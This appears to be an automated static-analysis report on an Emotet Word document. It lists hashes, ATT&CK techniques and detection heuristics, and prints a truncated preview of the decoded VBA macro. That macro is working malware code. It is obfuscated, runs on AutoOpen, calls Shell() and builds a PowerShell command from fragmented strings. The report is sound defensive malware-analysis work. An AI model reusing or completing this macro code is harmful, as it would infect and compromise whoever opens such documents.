Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 e1cf23f6d4a3b698…

MALICIOUS

Office (OLE)

Size: 219.5 KB
Created: 2018-06-29 08:13:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: e9a719612544bb6a972b835134fd9431
SHA-1: 68b0730b689bd83f4104b5f6dff9530784e17ee2
SHA-256: e1cf23f6d4a3b698b8006e349f25a85afc3ce4f1c6193de9d68ea0af64ddb7e8
Risk Score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. The macro calls the Shell() function, indicating an attempt to execute an external command. ClamAV detection identifies the file as Emotet, a known downloader family. The macro's obfuscation and its use of Shell() strongly suggest that it downloads and executes a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6962911-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6962911-0
  • VBA macros detected [medium, OLE_VBA_MACROS; 3 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13997 bytes
SHA-256: fe128fe82e08bae5fc39b84216a5182d1fbc3ea3361f10525c4ffd42ee1a054d

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "qGkznBWcFH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VHHmdGkkhzi"
Function EIjFNzNt()
On Error Resume Next
zLDuD = wDjvNz = 10463 / iNkMP + 72595 / ChrW(12804) / YmwIa + ChrW(wOHnw) * 27888 + ChrB(83966 * CInt(rBITwZ) * 11256 - Hex(jjuoHZ)) + cZJMin - Int(wuGpH) * (nazqV - ViEwoh)
oFQNl = XQfNoB - zbDNM / (RlwGj + Oct(TPDOX) - 57354 + Log(fRzKh))
ZbmVRY = bpZdtPARId + Chr(nLCSqbHL + vbKeyP + wlPAZ) + "owe" + "rs"
UrkDIM = pIttf = 81722 / hPbrzj + 19117 / ChrW(34987) / TBHjSW + ChrW(ARVjsP) * 63026 + ChrB(65189 * CInt(uVOKWJ) * 68684 - Hex(unPpHL)) + WCIRBB - Int(sSMscJ) * (qSjtE - OvHMK)
ZpfHG = FXKqHP - mScwwd / (aXEVjv + Oct(Gjbvv) - 13777 + Log(bnNLGA))
mzAKT = SmlzJ = 68019 / rBlKaK + 80044 / ChrW(98883) / ivLIwK + ChrW(PkrdJn) * 47056 + ChrB(6660 * CInt(MhlTz) * 55163 - Hex(MdrZBC)) + vKXwRF - Int(LRHHWO) * (GTEdh - OcEfpF)
ziEkd = zwSmp - zMBQd / (bOVGK + Oct(wUDWTF) - 84599 + Log(LwwjM))
EIjFNzNt = UsIZYUbtMq + ZbmVRY + kNGTizQiOR + oBzHi + zZPFA
iJOUn = OWjnMM = 52503 / NrntU + 32828 / ChrW(76214) / IddMu + ChrW(vBNUDF) * 64714 + ChrB(34755 * CInt(AScYak) * 32214 - Hex(GiYuU)) + FLvkV - Int(krani) * (iZrIVl - rnarsN)
sUWiV = bsHIIV - ROIsp / (ABqRwI + Oct(zcUiUD) - 44151 + Log(IQVsRz))
End Function
Sub AutoOpen()
On Error Resume Next
pRiAAZ = dfiCCM = 43813 / CXZim + 99373 / ChrW(45922) / oEwOIw + ChrW(zXsCLY) * 66576 + ChrB(96767 * CInt(NUzpv) * 34238 - Hex(KaHOz)) + jLwRo - Int(vBKWfr) * (iJKKcU - QURAi)
WEooAj = johDuk - DHCwUz / (nrzPf + Oct(XCOtwj) - 11658 + Log(rNWVv))
Application.Run "VjpHRwka", EIjFNzNt
CqcHQ = fWJSTj = 70320 / jMoYV + 80529 / ChrW(35652) / ZnFKiR + ChrW(ujdYv) * 19372 + ChrB(94050 * CInt(swnOB) * 88063 - Hex(aRzkni)) + zzFjY - Int(oBGNO) * (PmqHo - mzvai)
RjdNnL = dhVidT - ljars / (AqiJjJ + Oct(YAjcX) - 33072 + Log(RomaNv))
End Sub
Function VjpHRwka(iIGlKNGT)
On Error Resume Next
kctDM = baGXEh = 15532 / aFUdiA + 41498 / ChrW(56874) / sKMpv + ChrW(uzdzHQ) * 26228 + ChrB(70897 * CInt(WViwu) * 18071 - Hex(pJCqj)) + wjuzG - Int(BsAwjd) * (XbkAL - UOHIS)
jrTVD = EMcDuD - JljMW / (BUilz + Oct(IrdPD) - 80215 + Log(caXkhX))
LcRjUj = rBblBk = 72331 / CBFWP + 90478 / ChrW(90408) / zYNTaj + ChrW(BBpZLZ) * 6498 + ChrB(96444 * CInt(QYRqC) * 58335 - Hex(FpLXV)) + LICQCT - Int(GNGHP) * (jMKarz - nFrdE)
TWIiO = QWqjX - WjmKDR / (abupu + Oct(UXSqF) - 32605 + Log(LdApw))
RqcNGY = zfoiZAH + Shell(lXOLOH + iIGlKNGT + VQDSjuzIOjY, 628646070 - 628646070) + QRiXEp
rvzEtf = fUPQdC = 49242 / iwYjN + 30239 / ChrW(88389) / zflPzi + ChrW(jzLUaO) * 53063 + ChrB(45173 * CInt(KHjAI) * 3782 - Hex(CrDhh)) + IlSzGB - Int(IPnwa) * (SRhzGC - WWGjt)
vRiYvB = HoaBc - awtuT / (ZbiwVr + Oct(fHFmim) - 8699 + Log(FHZrsv))
End Function

Function kNGTizQiOR()
On Error Resume Next
AuLzs = aaABc = 90360 / ZFlHM + 12114 / ChrW(63817) / DKnPN + ChrW(zDPoz) * 710 + ChrB(85188 * CInt(uvAzo) * 58167 - Hex(miKnh)) + mcjkZ - Int(wzjXi) * (GaWlMc - RYLqHN)
CkQbd = jzNbjE - swEKXS / (hDzBW + Oct(sPiblZ) - 44750 + Log(ELjHu))
GGsJBn = "hell  " + Chr(34) + " $" + Chr(40) + " sV" + " 'OFS' " + " ''" + Chr(41) + Chr(34) + " " + Chr(43) + "[s" + "TrinG]" + Chr(40) + " " + "'41T"
wJNuB = CBVUA = 36543 / skzkOF + 92005 / ChrW(68063) / SlpJh + ChrW(okXCc) * 23595 + ChrB(42109 * CInt(qFzNi) * 82589 - Hex(KaSkiW)) + aRCwW - Int(rbFsbj) * (kwwqc - NJfOs)
sWHKW = CziJG - ipnfO / (HmvdJ + Oct(ccIII) - 93009 + Log(CKhiLk))
tGiBOoDW = "122-69" + "-89X" + "48X99p" + "104o12" + "2X32X9" + "8s111-10"
iTZmf = pwLmih = 89840 / HFVPNs + 66872 / ChrW(88364) / tomOD + ChrW(wLcuzR) * 76393 + ChrB(25031 * CInt(zhYdQ) * 40790 - Hex(aBPvE)) + Ozsio - Int(fwsMm) * (PbGmz - TsMRf)
EcvTN = wImjwi - PdkhL / (VmWBt + Oct(nECbL) - 950 + Log(RYdLHM))
tqrQVVa = "3-10" + "4-110p121" + "s45p6" + "7-104o" + "121-3" + "5T90p104" + "p111p78-"
IOdVfi = kikjLA = 23565 / jibBA + 48780 / ChrW(
... (truncated)